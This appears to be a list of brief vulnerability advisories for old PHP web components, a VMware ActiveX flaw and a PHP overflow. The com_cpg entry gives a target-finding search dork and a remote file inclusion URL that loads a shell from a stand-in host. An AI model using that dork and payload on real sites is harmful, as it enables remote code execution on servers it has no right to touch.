A Remote File Inclusion vulnerability was discovered in Mambo phpShop v1.2 RC2b, a fully featured shop component with IPN support, categories, userhandling, etc. An attacker can exploit this vulnerability to include arbitrary files from remote locations by manipulating the 'mosConfig_absolute_path' parameter in the 'toolbar.phpshop.html.php' script. This can be exploited to execute arbitrary PHP code on the vulnerable system.
A remote include vulnerability exists in Mambo jim Component. The vulnerability is due to the 'install.jim.php' script not properly sanitizing user-supplied input. This may allow a remote attacker to include a file from a remote host that contains arbitrary code, resulting in a loss of integrity.
The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'mosConfig_absolute_path' parameter in 'mambelfish.class.php' script. A remote attacker can include arbitrary files from remote resources and execute arbitrary code on the vulnerable system.
powergap <= (s0x.php) Remote File Inclusion Exploit is a vulnerability that allows an attacker to include a remote file, usually through a script on the web server. This vulnerability can be exploited by malicious people to bypass access controls, and potentially disclose sensitive information or exploit vulnerabilities in the remote file.
A remote SQL injection vulnerability exists in WebTorrent (WTcom) Script version 0.2.4 and earlier. An attacker can exploit this vulnerability to gain access to every username, password and email stored in the database. The vulnerability is due to insufficient sanitization of user-supplied input to the 'cat' parameter in the 'torrents.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script.
IRSR - Invisionix Roaming System Remote version 0.2 is vulnerable to a Remote File Include vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the '_sysSessionPath' parameter of 'pageheaderdefault.inc.php' script. This may allow a remote attacker to include a file from a remote host that contains arbitrary code and execute it in the context of the webserver process.
CubeCart is vulnerable to a blind SQL injection vulnerability in the "oid" parameter of the "/modules/gateway/Protx/confirmed.php" script. An attacker can exploit this vulnerability to disclose admin credentials and gain access to the application.
This bug allows a remote attacker to execute commands via RFI. The bug is present in the cpg.php file, which is vulnerable to RFI due to the presence of the line 'require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");'. The exploit can be triggered by using a dork 'inurl:com_cpg' and sending a malicious HTTP request to the vulnerable URL 'htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=http://evil.xxx/shell.txt?'
On running windows system, you can't delete, format and change system dirver. VMware register a COM Object use for Virtual Disk, but it's very danger. If you allow unsafe ActiveX and jscript, and has VMware installed, the vmware.htm will delete all harddisk partition table on the windows system.
This exploit is for PHP versions 4.4.3 and 5.1.4. It is a local buffer overflow exploit that can be used to gain access to a system. The exploit works by setting the $base_addr to 0x41414141 and then restarting the Apache service. The exploit is then executed via a web browser and the Apache error log is checked for a segmentation fault. GDB is then used to find the offsets of the buffer and shell code. Finally, the $base_addr is changed in the exploit and the exploit is executed again.